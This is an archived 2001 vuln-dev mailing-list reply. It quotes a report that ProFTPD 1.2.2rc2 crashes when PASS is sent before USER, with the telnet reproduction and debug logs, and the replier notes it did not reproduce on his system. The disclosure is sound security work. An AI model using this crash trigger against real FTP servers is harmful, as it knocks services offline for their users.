Hello This is not work on my Rh 7.0 and Proftp 1.2.2rc2 This is telnet output: [root@kafejka /root]# telnet 0 21 Trying 0.0.0.0... Connected to 0. Escape character is '^]'. 220 kafejka.metronet.pl FTP server ready. PASS 503 Login with USER first. Marcin Chojna Only SysAdmin ----- Original Message ----- From: Daniel <danielat_private> To: <vuln-devat_private> Sent: Monday, June 04, 2001 12:53 AM Subject: ProFTPD 1.2.2rc2 DoS > > I've discovered that ProFTPD 1.2.2rc2 has a bug - each instance of the > daemon can be crashed remotely: > This happens when the PASS command is received before the USER command: > box:~# telnet 127.0.0.1 21 > Trying 127.0.0.1... > Connected to 127.0.0.1. > Escape character is '^]'. > 220 ProFTPD 1.2.2rc2 Server (ProFTPD Default Installation) [box.xxx.com] > pass > Connection closed by foreign host. > box:~# > If you run proftpd -d 5, (debug mode, level 5) in the logs you see: > box.xxx.com (localhost[127.0.0.1]) - FTP session opened. > box.xxx.com (localhost[127.0.0.1]) - received: PASS (hidden) > box.xxx.com (localhost[127.0.0.1]) - ProFTPD terminating (signal 11) > > - Daniel Volozov > > > >
This archive was generated by hypermail 2b30 : Mon Jun 04 2001 - 12:40:00 PDT